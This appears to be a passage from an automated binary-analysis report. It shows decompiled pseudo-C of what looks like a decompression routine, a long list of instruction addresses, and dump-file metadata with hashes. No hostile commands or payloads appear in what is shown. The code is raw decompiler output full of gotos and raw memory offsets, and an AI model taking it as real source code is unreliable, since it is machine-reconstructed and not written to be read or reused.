						E00D847DA(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}









































































































































              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d858a1
              0x00d858a1
              0x00d858a7
              0x00d858b2
              0x00000000
              0x00d858b4
              0x00d858b4
              0x00d858b4
              0x00d858ba
              0x00d858ba
              0x00d858c3
              0x00d858c6
              0x00000000
              0x00000000
              0x00d858d5
              0x00d858dc
              0x00d85e87
              0x00d85e89
              0x00d85e8e
              0x00d85e95
              0x00d85e95
              0x00d858e2
              0x00d858e2
              0x00d858e3
              0x00d858e6
              0x00d858ed
              0x00000000
              0x00000000
              0x00d858f3
              0x00d858fb
              0x00d858fc
              0x00d858fd
              0x00d858fe
              0x00d85905
              0x00000000
              0x00d85907
              0x00000000
              0x00d85907
              0x00d85905
              0x00d8590c
              0x00d8590e
              0x00d85913
              0x00d85915
              0x00000000
              0x00d8591b
              0x00d8591b
              0x00d8591b
              0x00d8591e
              0x00d8591e
              0x00d8592e
              0x00d85933
              0x00d85973
              0x00d85975
              0x00d8597c
              0x00d85982
              0x00d85988
              0x00d8598f
              0x00d859bb
              0x00d859bd
              0x00d859be
              0x00d859bf
              0x00d859c1
              0x00d859da
              0x00d859dd
              0x00d859e4
              0x00d859e7
              0x00d859ea
              0x00d859f6
              0x00d85a02
              0x00d85a04
              0x00d85a0a
              0x00d85a0c
              0x00d85a0c
              0x00d85a0e
              0x00000000
              0x00d859c3
              0x00d859c6
              0x00d859c9
              0x00d859c9
              0x00d859c9
              0x00d859cb
              0x00d859d8
              0x00d859d8
              0x00d859d8
              0x00d859cd
              0x00d859cd
              0x00d859ce
              0x00d859d1
              0x00d859d4
              0x00000000
              0x00d859d6
              0x00000000
              0x00d859d6
              0x00d859d4
              0x00000000
              0x00d859c9
              0x00d85991
              0x00d85993
              0x00d85996
              0x00d859a0
              0x00d859a8
              0x00d859ae
              0x00d859b1
              0x00d85a16
              0x00d85a16
              0x00d85a1c
              0x00d85a58
              0x00d85a58
              0x00d85a5e
              0x00d85e5a
              0x00d85e5a
              0x00d85e60
              0x00d85e98
              0x00d85e98
              0x00d85e9e
              0x00d8603b
              0x00d8603b
              0x00d8603b
              0x00d86044
              0x00d86047
              0x00d86049
              0x00d8604d
              0x00d8605c
              0x00d8605e
              0x00d86061
              0x00d86068
              0x00d8606e
              0x00d86074
              0x00d8607b
              0x00d860a7
              0x00d860a9
              0x00d860aa
              0x00d860ab
              0x00d860ad
              0x00d860c9
              0x00d860cc
              0x00d860d3
              0x00d860d6
              0x00d860d9
              0x00d860e5
              0x00d860f1
              0x00d860f3
              0x00d860f9
              0x00d860fb
              0x00d860fb
              0x00d860fd
              0x00d86105
              0x00d86105
              0x00d86108
              0x00d8610b
              0x00d8611c
              0x00d8611f
              0x00d8611f
              0x00d8610d
              0x00d8610d
              0x00d8610d
              0x00d86121
              0x00d86124
              0x00d86126
              0x00d8612a
              0x00d86131
              0x00d86139
              0x00d8613b
              0x00d86142
              0x00d86145
              0x00d86145
              0x00d86148
              0x00d86148
              0x00d8614b
              0x00d86152
              0x00d86156
              0x00d86159
              0x00d8616b
              0x00d8616b
              0x00d86176
              0x00d86178
              0x00d8617d
              0x00d8617f
              0x00d86224
              0x00d86224
              0x00d86226
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00000000
              0x00d8589e
              0x00d8589e
              0x00d8622c
              0x00d8622c
              0x00d86232
              0x00d86232
              0x00d86238
              0x00d8623d
              0x00d86241
              0x00d86244
              0x00d86249
              0x00d86252
              0x00d86254
              0x00d86254
              0x00d86254
              0x00000000
              0x00d86232
              0x00d86185
              0x00d86185
              0x00d86187
              0x00000000
              0x00000000
              0x00d8618d
              0x00d8618d
              0x00d86193
              0x00d86195
              0x00d8619b
              0x00d8619e
              0x00d861a0
              0x00d861f1
              0x00d861f1
              0x00d861f4
              0x00000000
              0x00000000
              0x00d861fa
              0x00d861fc
              0x00d861fc
              0x00d861ff
              0x00d86203
              0x00d86205
              0x00d86205
              0x00d86209
              0x00d8620e
              0x00d86211
              0x00d86214
              0x00d86217
              0x00d8621a
              0x00d8621a
              0x00d8621a
              0x00000000
              0x00d8621f
              0x00d861a2
              0x00d861a4
              0x00d861a5
              0x00d861a7
              0x00000000
              0x00000000
              0x00d861ad
              0x00d861af
              0x00d861af
              0x00d861b2
              0x00d861b2
              0x00d861b4
              0x00d861b6
              0x00d861bc
              0x00d861c2
              0x00d861c8
              0x00d861ce
              0x00d861d4
              0x00d861da
              0x00d861dd
              0x00d861e0
              0x00d861e2
              0x00d861e5
              0x00d861e7
              0x00d861e7
              0x00d861e7
              0x00000000
              0x00d8615b
              0x00d8615b
              0x00d8615b
              0x00d86164
              0x00d86165
              0x00d85cb9
              0x00d85cb9
              0x00d85cc0
              0x00d85cc5
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d858a1
              0x00d858a1
              0x00d858a1
              0x00d858a7
              0x00d858b2
              0x00000000
              0x00d858b4
              0x00d858b4
              0x00d858b4
              0x00000000
              0x00d858b2
              0x00000000
              0x00d858a1
              0x00d85eb2
              0x00d85eb9
              0x00d85ecd
              0x00d85ecd
              0x00d85ed8
              0x00d85edb
              0x00d85ee0
              0x00d85ee2
              0x00d85ee4
              0x00d86001
              0x00d86001
              0x00d86003
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d858a1
              0x00d858a7
              0x00d858b2
              0x00000000
              0x00d858b4
              0x00d858b4
              0x00d858b4
              0x00d858b2
              0x00d8589e
              0x00d86009
              0x00d86009
              0x00d8600f
              0x00d8600f
              0x00d86015
              0x00d8601a
              0x00d8601e
              0x00d86021
              0x00d86026
              0x00d8602f
              0x00d86031
              0x00d86031
              0x00d86031
              0x00d86259
              0x00d86259
              0x00000000
              0x00d86259
              0x00d85eea
              0x00d85eea
              0x00d85eec
              0x00000000
              0x00000000
              0x00d85ef2
              0x00d85ef2
              0x00d85ef8
              0x00d85efa
              0x00d85f00
              0x00d85f03
              0x00d85f05
              0x00d85f4f
              0x00d85f4f
              0x00d85f52
              0x00d85f7d
              0x00d85f7d
              0x00d85f80
              0x00d85f82
              0x00000000
              0x00000000
              0x00d85f88
              0x00d85f8a
              0x00d85f8d
              0x00d85f90
              0x00d85f93
              0x00000000
              0x00000000
              0x00d85f99
              0x00d85f9c
              0x00d85f9f
              0x00d85fa2
              0x00d85fa5
              0x00000000
              0x00000000
              0x00d85fab
              0x00d85fae
              0x00d85fb1
              0x00d85fb4
              0x00d85fb7
              0x00000000
              0x00000000
              0x00d85fbd
              0x00d85fc0
              0x00d85fc3
              0x00d85fc6
              0x00d85fc9
              0x00000000
              0x00000000
              0x00d85fcf
              0x00d85fd2
              0x00d85fd5
              0x00d85fd8
              0x00d85fdb
              0x00000000
              0x00000000
              0x00d85fe1
              0x00d85fe4
              0x00d85fe7
              0x00d85fea
              0x00d85fed
              0x00000000
              0x00000000
              0x00d85ff3
              0x00d85ff6
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00d8589e
              0x00000000
              0x00d8589e
              0x00d8589e
              0x00d85f54
              0x00d85f56
              0x00d85f56
              0x00d85f59
              0x00d85f5d
              0x00d85f5f
              0x00d85f5f
              0x00d85f63
              0x00d85f68
              0x00d85f6b
              0x00d85f6e
              0x00d85f71
              0x00d85f74
              0x00d85f74
              0x00d85f74
              0x00d85f79
              0x00d85f79
              0x00000000
              0x00d85f79
              0x00d85f07
              0x00d85f09
              0x00d85f0a
              0x00d85f0c
              0x00000000
              0x00000000
              0x00d85f0e
              0x00d85f10
              0x00d85f10
              0x00d85f13
              0x00d85f13
              0x00d85f15
              0x00d85f17
              0x00d85f1d
              0x00d85f23
              0x00d85f29
              0x00d85f2f
              0x00d85f35
              0x00d85f3b
              0x00d85f3e
              0x00d85f41
              0x00d85f43
              0x00d85f46
              0x00d85f48
              0x00d85f48
              0x00d85f48
              0x00000000
              0x00d85f4d
              0x00d85ebb
              0x00d85ebb
              0x00d85ec4
              0x00d85ec5
              0x00000000
              0x00d85ec5
              0x00d85e73
              0x00d85e7a
              0x00d85e7f
              0x00d85e7f
              0x00000000
              0x00d8589e
              0x00d86159
              0x00d860af
              0x00d860b5
              0x00d860b8
              0x00d860b8
              0x00d860b8
              0x00d860ba
              0x00000000
              0x00000000
              0x00d860bc
              0x00d860bc
              0x00d860bd
              0x00d860c0
              0x00d860c3
              0x00000000
              0x00000000
              0x00d860c5
              0x00000000
              0x00d860c5
              0x00d860c7
              0x00d860c7
              0x00000000
              0x00d860c7
              0x00d8607d
              0x00d8607f
              0x00d86082
              0x00d8608c
              0x00d86094
              0x00d8609a
              0x00d8609d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d8604f
              0x00d8604f
              0x00d86052
              0x00d86054
              0x00d86057
              0x00d86057
              0x00d86057
              0x00000000
              0x00d8604f
              0x00d85ea4
              0x00d85ea4
              0x00d85ea7
              0x00d85eaa
              0x00d85eaa
              0x00d85e62
              0x00d85e68
              0x00d85e6a
              0x00d85e6f
              0x00d85e71
              0x00000000
              0x00000000
              0x00000000
              0x00d85e71
              0x00d85a64
              0x00d85a64
              0x00d85a6a
              0x00d85a6d
              0x00d85a7e
              0x00d85a81
              0x00d85a81
              0x00d85a6f
              0x00d85a6f
              0x00d85a6f
              0x00d85a83
              0x00d85a86
              0x00d85a88
              0x00d85a8c
              0x00d85a93
              0x00d85a9b
              0x00d85a9d
              0x00d85aa4
              0x00d85aa7
              0x00d85aa7
              0x00d85aaa
              0x00d85aaa
              0x00d85aaf
              0x00d85ab6
              0x00d85abc
              0x00d85ac2
              0x00d85ac9
              0x00d85af5
              0x00d85af7
              0x00d85af8
              0x00d85af9
              0x00d85afb
              0x00d85b17
              0x00d85b1a
              0x00d85b21
              0x00d85b24
              0x00d85b27
              0x00d85b33
              0x00d85b3f
              0x00d85b41
              0x00d85b47
              0x00d85b49
              0x00d85b49
              0x00d85b4b
              0x00000000
              0x00d85b4b
              0x00d85afd
              0x00d85b03
              0x00d85b06
              0x00d85b06
              0x00d85b06
              0x00d85b08
              0x00000000
              0x00000000
              0x00d85b0a
              0x00d85b0a
              0x00d85b0b
              0x00d85b0e
              0x00d85b11
              0x00000000
              0x00000000
              0x00d85b13
              0x00000000
              0x00d85b13
              0x00d85b15
              0x00d85b15
              0x00000000
              0x00d85acb
              0x00d85acb
              0x00d85acd
              0x00d85ad0
              0x00d85ada
              0x00d85ae2
              0x00d85ae8
              0x00d85aeb
              0x00d85b53
              0x00d85b53
              0x00d85b56
              0x00d85b59
              0x00d85b69
              0x00d85b6c
              0x00d85b6c
              0x00d85b5b
              0x00d85b5b
              0x00d85b5b
              0x00d85b6e
              0x00d85b6f
              0x00d85b73
              0x00d85b75
              0x00d85b79
              0x00d85b7b
              0x00d85c6f
              0x00d85c6f
              0x00000000
              0x00d85b81
              0x00d85b81
              0x00d85b81
              0x00d85b84
              0x00d85cca
              0x00d85ccd
              0x00d85cd6
              0x00d85cde
              0x00d85ce2
              0x00d85ce6
              0x00d85ced
              0x00d85cf0
              0x00d85cf6
              0x00d85c72
              0x00d85c72
              0x00d85c78
              0x00d85c7a
              0x00d85c7b
              0x00d85c81
              0x00d85c83
              0x00d85c84
              0x00d85c8a
              0x00d85c8c
              0x00d85c8c
              0x00d85c8c
              0x00d85c8a
              0x00d85c81
              0x00d85c90
              0x00d85c96
              0x00d85c9c
              0x00d85c9f
              0x00d85ca2
              0x00d85ca9
              0x00d85cac
              0x00d85cfe
              0x00d85d04
              0x00d85d07
              0x00d85d09
              0x00d85d10
              0x00d85d12
              0x00d85d14
              0x00d85e20
              0x00d85e20
              0x00d85e22
              0x00000000
              0x00000000
              0x00d85e28
              0x00d85e28
              0x00d85e2e
              0x00d85e2e
              0x00d85e34
              0x00d85e39
              0x00d85e3d
              0x00d85e40
              0x00d85e45
              0x00d85e4e
              0x00d85e50
              0x00d85e50
              0x00d85e50
              0x00000000
              0x00d85e55
              0x00d85d1a
              0x00d85d1a
              0x00d85d1c
              0x00000000
              0x00000000
              0x00d85d22
              0x00d85d22
              0x00d85d28
              0x00d85d2b
              0x00d85d31
              0x00d85d33
              0x00d85d37
              0x00d85d82
              0x00d85d82
              0x00d85d85
              0x00d85db4
              0x00d85db4
              0x00d85db6
              0x00d85dbe
              0x00d85dc1
              0x00d85dc4
              0x00d85dcd
              0x00d85dd0
              0x00d85dd3
              0x00d85ddc
              0x00d85ddf
              0x00d85de2
              0x00d85deb
              0x00d85dee
              0x00d85df1
              0x00d85dfa
              0x00d85dfd
              0x00d85e00
              0x00d85e09
              0x00d85e0c
              0x00d85e0f
              0x00d85e18
              0x00d85e18
              0x00d85e0f
              0x00d85e00
              0x00d85df1
              0x00d85de2
              0x00d85dd3
              0x00d85dc4
              0x00000000
              0x00d85db6
              0x00d85d87
              0x00d85d89
              0x00d85d89
              0x00d85d8c
              0x00d85d90
              0x00d85d92
              0x00d85d92
              0x00d85d96
              0x00d85d9b
              0x00d85d9e
              0x00d85da1
              0x00d85da4
              0x00d85da7
              0x00d85da7
              0x00d85da7
              0x00d85dac
              0x00d85db0
              0x00000000
              0x00d85db0
              0x00d85d39
              0x00d85d39
              0x00d85d3c
              0x00000000
              0x00000000
              0x00d85d3e
              0x00d85d40
              0x00d85d40
              0x00d85d43
              0x00d85d43
              0x00d85d45
              0x00d85d48
              0x00d85d4e
              0x00d85d54
              0x00d85d5a
              0x00d85d60
              0x00d85d66
              0x00d85d6c
              0x00d85d6f
              0x00d85d72
              0x00d85d75
              0x00d85d78
              0x00d85d7b
              0x00d85d7b
              0x00d85d7b
              0x00000000
              0x00d85cae
              0x00d85cae
              0x00d85cae
              0x00d85cb7
              0x00d85cb8
              0x00000000
              0x00d85cb8
              0x00d85cac
              0x00d85b8a
              0x00d85b8a
              0x00d85bbd
              0x00d85b8c
              0x00d85b8f
              0x00d85b98
              0x00d85ba0
              0x00d85ba3
              0x00d85bab
              0x00d85bb2
              0x00d85bb8
              0x00d85bb8
              0x00d85bc2
              0x00d85bc9
              0x00d85bcf
              0x00d85bd5
              0x00d85bdc
              0x00d85c08
              0x00d85c0a
              0x00d85c0b
              0x00d85c0c
              0x00d85c0e
              0x00d85c2a
              0x00d85c2d
              0x00d85c34
              0x00d85c37
              0x00d85c3a
              0x00d85c46
              0x00d85c52
              0x00d85c54
              0x00d85c5a
              0x00d85c5c
              0x00d85c5c
              0x00d85c5e
              0x00000000
              0x00d85c5e
              0x00d85c10
              0x00d85c16
              0x00d85c19
              0x00d85c19
              0x00d85c19
              0x00d85c1b
              0x00000000
              0x00000000
              0x00d85c1d
              0x00d85c1d
              0x00d85c1e
              0x00d85c21
              0x00d85c24
              0x00000000
              0x00000000
              0x00d85c26
              0x00000000
              0x00d85c26
              0x00d85c28
              0x00d85c28
              0x00000000
              0x00d85bde
              0x00d85bde
              0x00d85be0
              0x00d85be3
              0x00d85bed
              0x00d85bf5
              0x00d85bfb
              0x00d85bfe
              0x00d85c66
              0x00d85c69
              0x00d85c69
              0x00d85c6b
              0x00000000
              0x00d85c6b
              0x00d85bdc
              0x00d85b7b
              0x00d85ac9
              0x00d85a1e
              0x00d85a1e
              0x00d85a25
              0x00d85a43
              0x00d85a49
              0x00d85a4e
              0x00d85a51
              0x00000000
              0x00d85a51
              0x00d85a27
              0x00d85a34
              0x00d85a3c
              0x00000000
              0x00d85a3c
              0x00d8598f
              0x00d85935
              0x00d85935
              0x00d85937
              0x00000000
              0x00000000
              0x00d85939
              0x00d8593b
              0x00d85940
              0x00d85946
              0x00d8594c
              0x00000000
              0x00000000
              0x00d85952
              0x00d85952
              0x00d85966
              0x00d85966
              0x00d8596d
              0x00d86261
              0x00d86261
              0x00000000
              0x00d86261
              0x00000000
              0x00d8596d
              0x00d85954
              0x00d85954
              0x00d8595a
              0x00d85960
              0x00000000
              0x00000000
              0x00000000
              0x00d85960
              0x00d858a1

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
              • Instruction ID: aa85a89507617bd9b6be83efe26b6133240413144f57db52768baa0abb35366a
              • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
              • Instruction Fuzzy Hash: 8B621B71604B859FCB25EF38D8906B9BBE1AF95304F08855ED8EB8B346D730E945CB24
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D86CDB, Relevance: .8, Instructions: 773COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 98%
              			E00D86CDB(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E00D7A4ED(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E00D7A4ED(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E00D7A4ED(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
